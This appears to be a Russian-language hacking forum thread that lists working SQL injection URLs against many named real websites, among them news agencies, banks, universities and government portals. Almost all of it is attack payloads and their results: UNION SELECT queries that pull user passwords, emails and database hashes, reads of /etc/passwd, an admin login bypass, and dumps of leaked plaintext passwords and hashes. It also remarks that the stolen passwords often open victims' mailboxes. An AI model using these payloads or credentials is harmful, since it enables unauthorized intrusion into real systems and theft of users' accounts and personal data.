SQL Инъекции

http://www.operator.vesti.ru/

Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.

По характерному поведению удалось выяснить, что там крутится Oracle:

Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Solaris: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Пользователь, от которого работает пага: www

Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.

Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www

Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().

Так можно смотреть имена полей таблиц на примере таблицы FUSERS.

 

Для любителей джаза

код:

http://www.souljazzrecords.co.uk/releases/?id=4973+union+select+1,concat(password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14+from+accounts+limit+3907,1/*

в поле логина вводить емейл

p.s в большинстве случаев пароли так-же подходят к почтовым ящикам

 

Code:

http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=@ @version--

Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Выводим таблицу где есть колонка password

Code:

http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+top+1+ table_name+from+information_schema.columns+where+column_name+like+'password')--

Нужная таблица - users =)
Узнаём имена колонок

На этом, пожалуй, остановимся =))

Code:

http://www.elporvenir. com.mx/avisos_cat.asp? cat_id=1+or+1=@@version--

Code:

http://www.cap.edu.mx /Content.aspx? ID=1+or+1=@@version--

Code:

http://www.correo-gto.com.mx /notas.asp?id= 1+or+1=@@version--

Code:

http://www.tashop.ru /order/frame.asp?id= 1+or+1=@@version--

 

Северо-Восточный Инвестиционный Банк

User: [email protected]
Version: 4.0.27-max-log

 

Code:

http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,Username,userpass),9+from+hpsas_recsports.Tigeradmin_Users/*
http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user,password),9+from+mysql.user/*

Code:

http://www.essor.gov.ml/cgi-bin/view_article.pl?id=-1+union+select+1,user,password,4,5,6,7,8,9+from+mysql.user--

 

http://www.gelyon.ru/news.php?id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6/*

4.0.26/wwwgelyonru/[email protected]


http://www.head-hunting.ru/z_parser.php?base_name=headhunting_second&id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6,7/*

4.1.21-log/db00084672/00084672@localhost


http://www.solange.ru/gallery/show.phtm?s=14&z=0&t=-1+union+select+concat(version(),0x2F,database(),0x2F,user()),2,3,4,5,6,7,8,9,10/*

4.1.21-standard/intermoda/[email protected]


http://www.chernomor.com/vzrosltours.php?tp=1&obj=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,database(),0x2F,user()),8,9,10/*

4.1.22-standard/chernomo_main/chernomo_main@localhost


http://fest.camps.su/event.php?id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4/*

4.1.21-standard-log/campssu_main/campssu_user@localhost

 

Code:

http://www.monbat.com/index.php?l_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4/*&change_lang=yes

DOTSTUDIO@LOCALHOST:5.0.45-LOG:WEB

Code:

http://www.oursportscentral.com/services/maps/largemap.php?l_id=-1'+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*

oursport_public@localhost:4.1.20-logursport_osc

Code:

http://www.rentayacht.gr/location.php?l_id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(version(),0x71),0x71),7,8,9,10,11/*

Code:

http://www.oli-lacke.de/firma.php?m_id=1&l_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8/*&lang=ru

[email protected]:5.0.32-Debian_7etch1~bpo.1-logli_lacke_de

Code:

http://www.ntnui.no/ogruppa/paamelding/paameldingsliste.php?l_id=9999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16/*

[email protected]:4.0.18-Maxgruppa_db

 

dev:Jahdeha5:dev.build.ppckernel.org
hercules:hohKie4r:hercules.xorsis.com
hermes:Chofei5w:hermes.ppckernel.org
m2:yie7Phoi:m2.bccd.cluster.earlham.edu
c15:lohcooD2:c15.cluster.earlham.edu
acl2:eeceaZ8u:acl2.cs.earlham.edu
tobias:tmb2h3a:tobias.cluster.earlham.edu
hermes64:Chofei5w:hermes.ppckernel.org

admin:c84258e9c39059a89ab77d846ddab909 мд5()
admin:admin2

 

http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&search=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user())/*

5.0.27/petroholru_info/[email protected] доступ к information_schema есть. ничего толкового не нашел


http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user()),5,6,7,8,9,10/*

4.1.20/sovetnik_n/sovetnik_n@localhost

 

Всероссийский туроператор свадебных путешествий

Code:

http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*

юзер:[email protected]
база:db_galeeva_1
версия:4.1.18

 

Code:

http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*

 

Code:

http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.user/*

1. root — 72f840f85cf3bb40
2. gostorgi — 72f840f85cf3bb40

 

2 ElteRUS
По поводу http://www.infohotel.ru
Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...

Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
username-admin
password-3fe4220069643d6d
Сильно подозреваю что это для входа в админку
Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал.

 

http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),user_password,0x25,user_email),6,7,8,9,10,11,12+from+phpbb_users+limit+1,1/*

 

Code:

http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--

 

Code:

http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*

adam@localhost:5.0.32-Debian_7etch1-log:adam

Code:

http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*

[email protected]:5.0.26-logcblklesmin

Code:

http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*

poczta_bonus@localhost:5.0.33-logoczta_bonus

Code:

http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10/*

5.0.24-Debian_0.dotdeb.0-log

 

edu

MySQL 4.x.x.

Code:

http://spacegrant.nmsu.[B]edu[/B]/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*

MySQL 3.x.x.

Code:

http://www.auburn.[B]edu[/B]/oit/oitnews/article.php?num=57+/*!40000+and+0+*/

 

ФК Химки

Code:

http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

[email protected]
Версия 4.0.27-max-log

ФК Торпедо

Code:

http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news/*

 

Интернет-провайдер в Тушино

root;396c55134cded03d
4.0.20-log

 

fobo.ru


http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*

5.0.45-Dotdeb_0.dotdeb.0-log/fobo/fobo@localhost

http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(username,0x2F,password,0x2F,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+user+limit+10000,1/*

имя\хеш\мейл 71530 участников )))